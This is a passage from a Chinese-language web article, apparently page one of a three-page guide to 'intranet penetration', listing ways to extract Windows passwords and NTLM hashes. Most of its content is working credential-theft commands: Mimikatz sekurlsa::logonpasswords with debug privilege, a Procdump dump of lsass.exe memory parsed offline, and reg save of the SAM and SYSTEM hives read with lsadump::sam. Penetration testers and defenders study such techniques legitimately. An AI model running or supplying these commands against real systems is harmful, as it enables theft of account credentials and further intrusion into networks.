侵權(quán)投訴
訂閱
糾錯
加入自媒體

內(nèi)網(wǎng)滲透—獲取Windows內(nèi)Hash密碼方法總結(jié)

1、直接讀取

Mimikatz讀取明文密碼和hash時需要管理員權(quán)限。

privilege::debug           //提升至debug權(quán)限

sekurlsa::logonpasswords   //抓取密碼

image.png

image.png

2、Procdump+Mimikatz離線讀取lsass.dmp文件

Procdump是微軟官方發(fā)布的工具,可以用來將目標(biāo)lsass文件導(dǎo)出。先在目標(biāo)機(jī)器上上傳Procdump,導(dǎo)出lsass.dmp

procdump64.exe-accepteula-ma

lsass.exe lsass.dmp

image.png

image.png

將目標(biāo)機(jī)上的lsass.dmp下載到本地后,執(zhí)行Mimikatz導(dǎo)出lsass.dmp里面的密碼和hash:

sekurlsa::minidump 目錄lsass.dmp //將導(dǎo)出的lsass.dmp載入到Mimikatz中

sekurlsa::logonpasswords full    //獲取密碼

3、通過SAM和System文件抓取密碼和Hash

首先利用注冊表命令將目標(biāo)機(jī)的sam或者system文件導(dǎo)出

reg save hklmsam sam.hive

reg save hklmsystem system.hive

image.png

然后將目標(biāo)機(jī)上的sam.hive和system.hive下載到本地,利用Mimikatz讀取sam和system文件獲取NTLMHash:

token::elevate

lsadump::sam

image.png

image.png

<上一頁  1  2  3  下一頁>  
聲明: 本文由入駐維科號的作者撰寫,觀點(diǎn)僅代表作者本人,不代表OFweek立場。如有侵權(quán)或其他問題,請聯(lián)系舉報。

發(fā)表評論

0條評論,0人參與

請輸入評論內(nèi)容...

請輸入評論/評論長度6~500個字

您提交的評論過于頻繁,請輸入驗(yàn)證碼繼續(xù)

  • 看不清,點(diǎn)擊換一張  刷新

暫無評論

暫無評論

安防 獵頭職位 更多
文章糾錯
x
*文字標(biāo)題:
*糾錯內(nèi)容:
聯(lián)系郵箱:
*驗(yàn) 證 碼:

粵公網(wǎng)安備 44030502002758號